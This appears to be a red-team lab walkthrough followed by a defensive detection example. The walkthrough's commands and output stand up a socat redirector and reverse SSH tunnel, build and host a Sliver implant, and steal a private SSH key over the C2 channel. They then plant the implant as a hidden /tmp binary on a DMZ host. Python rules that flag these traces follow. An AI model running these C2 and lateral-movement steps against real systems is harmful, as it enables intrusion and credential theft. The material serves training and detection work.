It takes a while, but you manage to provision a redirector and get a Sliver agent built and ready.
You provision a cloud server and authenticate to it with an SSH key. You then install socat and bind a listener to a port:
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# sudo socat tcp-listen:8443,reuseaddr,fork,bind=[server IP] tcp:127.0.0.1:4567
Then, you open a reverse port forward from your Kali teamserver:
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:37:41] ssh -N -R 4567:localhost:8443 -i [ssh key] root@[cloud server IP]
[server] sliver > mtls --lhost 127.0.0.1 --lport 8443
[*] Starting mTLS listener ...
[server] sliver >
[*] Successfully started job #1
[server] sliver > generate --mtls [cloud host IP]:8443 --os linux
[*] Generating new linux/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:31
[*] Implant saved to /home/kali/Desktop/RICH_ALCOVE
You transfer this payload to the new cloud host and host it in a web directory as index.html:
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:42:44] scp -i [ssh key] RICH_ALCOVE root@[cloud server IP]:~/
RICH_ALCOVE 100% 14MB 4.6MB/s 00:02
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# mkdir www
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# mv RICH_ALCOVE www
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cd www/
root@ubuntu-s-1vcpu-1gb-nyc1-01:~/www# mv RICH_ALCOVE index.html
root@ubuntu-s-1vcpu-1gb-nyc1-01:~/www# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
You can now inject a command into the web application to download and execute the Sliver agent. The session's remote address shows as 127.0.0.1 because the callback arrives through the SSH reverse tunnel:
[*] Session d5d0d432 RICH_ALCOVE - 127.0.0.1:60646 (a747d8e29077) - linux/amd64 - Sun, 23 Oct 2022 16:50:21 EDT
[server] sliver > use d5d0d432-6cc1-42bf-bd6b-8a302d44da43
[*] Active session RICH_ALCOVE (d5d0d432-6cc1-42bf-bd6b-8a302d44da43)
[server] sliver (RICH_ALCOVE) > whoami
Logon ID: root
You now have an authenticated, encrypted session established in the target network. The team rejoices! You download the SSH key securely via the Sliver agent’s mTLS communication channel:
[server] sliver (RICH_ALCOVE) > download /mnt/foo/home/risottoadmin/.ssh/id_rsa
[*] Wrote 2610 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/Desktop/id_rsa
You then use this key to copy the Sliver agent to the DMZ server and execute it:
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:53:27] chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:53:58] mv RICH_ALCOVE .x11-lock
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:54:12] scp -i id_rsa .x11-lock risottoadmin@dmz.risottocorp.lan:/tmp
The authenticity of host 'dmz.risottocorp.lan (10.10.1.152)' can't be established.
ED25519 key fingerprint is SHA256:AXU17FvZjCkmSljfCuy2nZ5ZYVCaMyr+uZdf+S6vHAU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:6: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'dmz.risottocorp.lan' (ED25519) to the list of known hosts.
.x11-lock
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:55:24] ssh -i id_rsa risottoadmin@dmz.risottocorp.lan "/tmp/.x11-lock &"
[*] Session faf5c9b9 RICH_ALCOVE - 127.0.0.1:44312 (risotto-dmz) - linux/amd64 - Sun, 23 Oct 2022 16:56:21 EDT
[server] sliver (RICH_ALCOVE) > use faf5c9b9-2e30-474a-b323-f3f1142df44d
[*] Active session RICH_ALCOVE (faf5c9b9-2e30-474a-b323-f3f1142df44d)
[server] sliver (RICH_ALCOVE) > whoami
Logon ID: risottoadmin
Success! Your team congratulates you on your excellent find. Your team lead specifically calls out how carefully you handled the entire situation.
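Seen from the defender's side, the two footholds above leave the same kind of endpoint traces: a dot-prefixed binary executed from /tmp as an sshd remote command, and a process that is not an SSH client reading an id_rsa file. The following is an added example, not part of the original write-up and not Sliver's own code: a small Python rule set run over constructed endpoint events that mirror those steps. The event layout, the /tmp/index.html path for the first implant, and the key-reader allowlist are assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Constructed endpoint telemetry (not real logs), one dict per process or
# file event, modelled on the activity in the write-up above.
EVENTS = [
    # DMZ host: sshd runs a remote command that executes a hidden binary in /tmp
    {"host": "risotto-dmz", "type": "exec", "user": "risottoadmin",
     "exe": "/tmp/.x11-lock", "parent_exe": "/usr/sbin/sshd",
     "cmdline": "/tmp/.x11-lock"},
    # DMZ host: an ordinary interactive login shell spawned by sshd (benign)
    {"host": "risotto-dmz", "type": "exec", "user": "risottoadmin",
     "exe": "/bin/bash", "parent_exe": "/usr/sbin/sshd", "cmdline": "-bash"},
    # web host: the implant (assumed to have been saved as /tmp/index.html)
    # reads a private SSH key from a mounted home directory
    {"host": "a747d8e29077", "type": "file_open", "user": "root",
     "exe": "/tmp/index.html",
     "path": "/mnt/foo/home/risottoadmin/.ssh/id_rsa"},
    # web host: the ssh client reads its own key (expected behaviour)
    {"host": "a747d8e29077", "type": "file_open", "user": "root",
     "exe": "/usr/bin/ssh", "path": "/root/.ssh/id_rsa"},
]

# World-writable staging directories commonly abused for dropped binaries.
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Assumed allowlist of programs expected to open private keys.
KEY_READERS = {"/usr/bin/ssh", "/usr/bin/scp", "/usr/bin/sftp",
               "/usr/bin/ssh-add", "/usr/bin/ssh-keygen"}
PRIVATE_KEY_RE = re.compile(r"/\.ssh/id_(rsa|dsa|ecdsa|ed25519)$")


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def hidden_tmp_exec(ev):
    """Execution of a dot-prefixed file from a temp directory (e.g. /tmp/.x11-lock)."""
    if ev["type"] != "exec":
        return None
    exe = ev["exe"]
    if exe.startswith(TMP_DIRS) and exe.rsplit("/", 1)[-1].startswith("."):
        return Finding(ev["host"], "hidden-binary-in-tmp",
                       f"{ev['user']} executed {exe} (parent {ev['parent_exe']})")
    return None


def sshd_remote_exec_tmp(ev):
    """sshd directly spawning a binary from a temp directory: a remote command
    such as ssh host "/tmp/x &" rather than an interactive shell."""
    if ev["type"] != "exec" or ev.get("parent_exe") != "/usr/sbin/sshd":
        return None
    if ev["exe"].startswith(TMP_DIRS):
        return Finding(ev["host"], "sshd-spawned-tmp-binary",
                       f"sshd ran {ev['cmdline']} as {ev['user']}")
    return None


def private_key_read(ev):
    """A process outside the SSH tooling allowlist opening an id_* private key."""
    if ev["type"] != "file_open":
        return None
    if PRIVATE_KEY_RE.search(ev["path"]) and ev["exe"] not in KEY_READERS:
        return Finding(ev["host"], "private-key-read",
                       f"{ev['exe']} opened {ev['path']} as {ev['user']}")
    return None


RULES = (hidden_tmp_exec, sshd_remote_exec_tmp, private_key_read)


def evaluate(events):
    """Run every rule over every event and collect the findings in order."""
    findings = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"[{f.host}] {f.rule}: {f.detail}")
```

Against the constructed events the DMZ execution fires two rules at once (hidden name and sshd parent), the key read by the implant fires the third, and the benign login shell and the ssh client's own key read produce nothing. In a real deployment the allowlist and temp-directory list would be tuned per host role, and the exec events would come from auditd, eBPF or an EDR rather than from a hand-built list.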